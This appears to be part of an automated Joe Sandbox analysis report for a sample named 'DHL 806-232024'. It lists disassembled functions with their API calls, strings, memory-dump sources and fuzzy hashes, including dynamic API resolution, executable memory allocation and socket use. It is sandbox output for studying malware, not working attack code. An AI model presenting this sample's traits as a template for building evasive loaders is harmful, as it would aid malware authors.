Function 008E62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008E63A8
_memmove.LIBCMT ref: 008E6446
_memset.LIBCMT ref: 008E646A

Strings

ERCP, xrefs: 008E6313

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 5c5fb3e91bd97406be946d1fb2e31b5a907c0740f443c1d44fd1164a0928c5b8
Instruction ID: 415b10acdff143a84746cf73f96ee342bda53662045e39944b6076ceaa22d3fe
Opcode Fuzzy Hash: 5c5fb3e91bd97406be946d1fb2e31b5a907c0740f443c1d44fd1164a0928c5b8
Instruction Fuzzy Hash: B451B171900759DBCB24CF65C8817AABBF4FF14358F20856EE94ACB281F771A5A0CB45

Function 00957BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0095F910,00000000,?,?,?,?), ref: 00957C4E
GetWindowLongW.USER32 ref: 00957C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00957C7B

Strings

SysTreeView32, xrefs: 00957C20

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 5d6204ead54346e0c6d63bdf7a492d1f1b33d6f029cb0f6d538edda44d1dab61
Instruction ID: 20165358eec5a9520996a2c105f03a8bce3ebb552ff23e9654ea085448b7d3ad
Opcode Fuzzy Hash: 5d6204ead54346e0c6d63bdf7a492d1f1b33d6f029cb0f6d538edda44d1dab61
Instruction Fuzzy Hash: 1531ED31204206AADB118F79DC05BEAB7A9EF44335F244725FCB5D32E0C730E9549B50

Function 00957648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009576D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009576E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00957708

Strings

SysMonthCal32, xrefs: 0095769B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: ba78da16905792386daccdbe642801199c71156d84d9f919879b45ab4c6238b9
Instruction ID: d8ea52db55cc0bfb9b443ea8c6986a503507d9acc1f26e16da86a86d7e3527a2
Opcode Fuzzy Hash: ba78da16905792386daccdbe642801199c71156d84d9f919879b45ab4c6238b9
Instruction Fuzzy Hash: 4B21E232514219BBDF11CFA5DC46FEB3B79EF88724F110214FE15AB1D0D6B1A8549BA0

Function 00956F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00956FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00956FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00956FDF

Strings

Listbox, xrefs: 00956F77

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 0284565c55879bd3b9d737a908711dfec0da0751d0237941fde9203e2497d141
Instruction ID: 667fe6bb97883ceabdbb6e17788b1050a7a28e6f2db3f9cec332ffd45476e885
Opcode Fuzzy Hash: 0284565c55879bd3b9d737a908711dfec0da0751d0237941fde9203e2497d141
Instruction Fuzzy Hash: 7921F232A10218BFEF11CF55EC84FAB3BAEEF89765F418124FD049B190C671AC158BA0

Function 0095797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009579E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009579F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00957A03

Strings

msctls_trackbar32, xrefs: 009579B8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 72245ff50da9fb2998e0cdc7a71570152c759c9ec6f41aa03deeaa5f3f8276c6
Instruction ID: 1a5e7048cab3a70798ef498ca733c3d916215d01bfcedfefa4c235e62cac42f3
Opcode Fuzzy Hash: 72245ff50da9fb2998e0cdc7a71570152c759c9ec6f41aa03deeaa5f3f8276c6
Instruction Fuzzy Hash: A211E332254208BAEF109FB6DC05FAB77ADEFC9B65F010519FA41A6090D271E811DB60

Function 008D4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,008D4C2E), ref: 008D4CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008D4CB5

Strings

kernel32.dll, xrefs: 008D4C9E
GetNativeSystemInfo, xrefs: 008D4CAF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: eb81768c771114ba3439b07db9d204913eef73d85811d9c5a2fbac6ed5782c5f
Instruction ID: 3bced59d69797077790ba5dd3992cb326921d865eb115b6a8014a9ff29181b9b
Opcode Fuzzy Hash: eb81768c771114ba3439b07db9d204913eef73d85811d9c5a2fbac6ed5782c5f
Instruction Fuzzy Hash: 1ED01731524B23CFD7209F32DA28A0677E9EF057A6F11883A988AD6250E670D884CB51

Function 008D4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,008D4CE1,?), ref: 008D4DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008D4DB4

Strings

kernel32.dll, xrefs: 008D4D9D
Wow64RevertWow64FsRedirection, xrefs: 008D4DAE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 00766311015ce71f030ca163bcc9168f15e4d3762f06eb8e5f956c1d3ae8646f
Instruction ID: 76c8c10c3be61cf3a9e7974b474de784b24cc4886de712c1832a033e9e0dfe27
Opcode Fuzzy Hash: 00766311015ce71f030ca163bcc9168f15e4d3762f06eb8e5f956c1d3ae8646f
Instruction Fuzzy Hash: 8FD01731568B13CFD720AF72D818A46B7E5EF0536AF21883AD8D6D6250E770D884CB50

Function 008D4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,008D4D2E,?,008D4F4F,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008D4D81

Strings

kernel32.dll, xrefs: 008D4D6A
Wow64DisableWow64FsRedirection, xrefs: 008D4D7B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 56f210fb60b3219de310e7f8e6f1aa241f5ee80c55a22da3c60bb552fe17a8a4
Instruction ID: 9d10dff14b8222de2707dda598fc1d7056d158c93f86f5bfc5b7af3796f30cb7
Opcode Fuzzy Hash: 56f210fb60b3219de310e7f8e6f1aa241f5ee80c55a22da3c60bb552fe17a8a4
Instruction Fuzzy Hash: 3BD01730528B13CFD720AF72D818616B7E9FF15376F21893A9896D6350E670D880CB60

Function 00951072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,009512C1), ref: 00951080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00951092

Strings

advapi32.dll, xrefs: 0095107B
RegDeleteKeyExW, xrefs: 0095108C

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: babcdfdf6de20d7fdc399a2d85ea7fe8f882cd7116170af055563894fc8ddfde
Instruction ID: 91598db695000a3e4a06a52ed3280a3414a3697fa3d89bc1d70670e54670bb77
Opcode Fuzzy Hash: babcdfdf6de20d7fdc399a2d85ea7fe8f882cd7116170af055563894fc8ddfde
Instruction Fuzzy Hash: A6D01230514712CFD720AF36D86861A76E8AF553A6B158C3DA8D5D7290D770C4C0C750

Function 009493F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00949009,?,0095F910), ref: 00949403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00949415

Strings

GetModuleHandleExW, xrefs: 0094940F
kernel32.dll, xrefs: 009493FE

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 2d9588faa3fae8d6b668994ab8db4b97ef65c1e632a0be8f8e816af476a2951f
Instruction ID: 02a92b2146dab6d07efaa9f10d911db4edfbe48560a35bc0d4d471efd0ed740a
Opcode Fuzzy Hash: 2d9588faa3fae8d6b668994ab8db4b97ef65c1e632a0be8f8e816af476a2951f
Instruction Fuzzy Hash: 1ED01234518723CFD7209F32D91D90776D9AF05366F11C83A94D5D6560DA70C480D751

Function 00911B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00911B42
__swprintf.LIBCMT ref: 00911B73

Strings

%.3d, xrefs: 00911B4D
WIN_XPe, xrefs: 00911BB2

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 60480a1a38e94eaceadca0076ea2bc4eca6beb1872a6ddf6c55d8564ba0ee6ba
Instruction ID: acde5a8c40393bf53db9feef0c735704ce957bc3239394d61e660e27e24bad8c
Opcode Fuzzy Hash: 60480a1a38e94eaceadca0076ea2bc4eca6beb1872a6ddf6c55d8564ba0ee6ba
Instruction Fuzzy Hash: 2CD0ECB195811CFACA449A9098448FA737CB704311F5009A2F602D1544F2289BC4EB25

Function 009276C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e13b252062d31f95caec5efd70f0bf9efa69a325177365a7fbf78e384e880d57
Instruction ID: c1d71467a96dcf16717e311c4563b510a0b49530943ad153b4a6af46e47d09c1
Opcode Fuzzy Hash: e13b252062d31f95caec5efd70f0bf9efa69a325177365a7fbf78e384e880d57
Instruction Fuzzy Hash: B7C16D79A04226EFCB14CF94D884EAEF7B9FF48710B118599E805EB255D730ED81CB90

Function 0094E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0094E3D2
CharLowerBuffW.USER32(?,?), ref: 0094E415

Part of subcall function 0094DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0094DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0094E615
_memmove.LIBCMT ref: 0094E628

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 77e43ea808054a466d0e545baecd399b83f628e3f1737711f39c40f23a8f6db4
Instruction ID: 865d22332ffcae3a00bc09d330aa6b4aa8a2d00af2c4836fe5108c8ba9711165
Opcode Fuzzy Hash: 77e43ea808054a466d0e545baecd399b83f628e3f1737711f39c40f23a8f6db4
Instruction Fuzzy Hash: 54C126716083119FCB14DF28C490A6ABBE4FF88714F14896EF999DB351E731E946CB82

Function 009483A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009483D8
CoUninitialize.OLE32 ref: 009483E3

Part of subcall function 0092DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DAC5

VariantInit.OLEAUT32(?), ref: 009483EE
VariantClear.OLEAUT32(?), ref: 009486BF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 118ab0623a8e54277492696a94d4f305c859e51e19343600f0ba1ab7bc50850d
Instruction ID: 2038cbc398a21e020b354cdb874455b7820fd11653e438ff53cddcb8070d7375
Opcode Fuzzy Hash: 118ab0623a8e54277492696a94d4f305c859e51e19343600f0ba1ab7bc50850d
Instruction Fuzzy Hash: 55A1F475204711AFCB10EF28C495E2ABBE5FF88314F154959F99A9B3A2CB34ED44CB42

Function 00927A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C32
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C4A
CLSIDFromProgID.OLE32(?,?,00000000,0095FB80,000000FF,?,00000000,00000800,00000000,?,00962C7C,?), ref: 00927C6F
_memcmp.LIBCMT ref: 00927C90

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: cdf9de91238fe829cf54f96888a36abbd14cb328a6591c089ae5021a9fde7689
Instruction ID: dfec31bcd41f31adaaf921c43d4ec5a4f4a0e3665480dc11453942d02a2e906d
Opcode Fuzzy Hash: cdf9de91238fe829cf54f96888a36abbd14cb328a6591c089ae5021a9fde7689
Instruction Fuzzy Hash: 30811771A00119EFCB00DFE4C884EAEB7B9FF89315F204599E506BB254DB31AE06CB61

Function 00926DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00926E04
SysAllocString.OLEAUT32(00000000), ref: 00926EAD
VariantCopy.OLEAUT32 ref: 00926EDC
VariantClear.OLEAUT32(?), ref: 00926F03

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 489766af66bbc369aca61ec516d6b500384b061142af17d06ad5497355f8aaab
Instruction ID: 89a8766e89b0864bf2c6d30c9e953607b2736108e256c738fd3bdceb0f27eb41
Opcode Fuzzy Hash: 489766af66bbc369aca61ec516d6b500384b061142af17d06ad5497355f8aaab
Instruction Fuzzy Hash: 0451FA306483119EDB30AFA9F491B7AF3E9EF49310F208C1FE596D7695DB3498449B01

Function 00959A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00E2E4F0,?), ref: 00959AD2
ScreenToClient.USER32(00000002,00000002), ref: 00959B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00959B72

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7678cff716fac743c8e80b0f6cdeffc9cb49adca38841907c5f1320626cb10ea
Instruction ID: da719275b2388c5b9bd3c3a42db86dca27a58252d111f25e0e5d31a0bb865070
Opcode Fuzzy Hash: 7678cff716fac743c8e80b0f6cdeffc9cb49adca38841907c5f1320626cb10ea
Instruction Fuzzy Hash: 0E514F34A00209EFEF10DF69E980AAE7BBAFF55361F148259FC159B290D730AD45DB90

Function 00946CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00946CE4
WSAGetLastError.WSOCK32(00000000), ref: 00946CF4

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00946D58
WSAGetLastError.WSOCK32(00000000), ref: 00946D64

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: a48682f98031d0dc256941a7058a729850b10af6401901eff55da4d7d2a4c50c
Instruction ID: 3b731d2c1efa7e1caf5542c00606a6b20a45f2234a97ad0f71b5bf55c4bd3868
Opcode Fuzzy Hash: a48682f98031d0dc256941a7058a729850b10af6401901eff55da4d7d2a4c50c
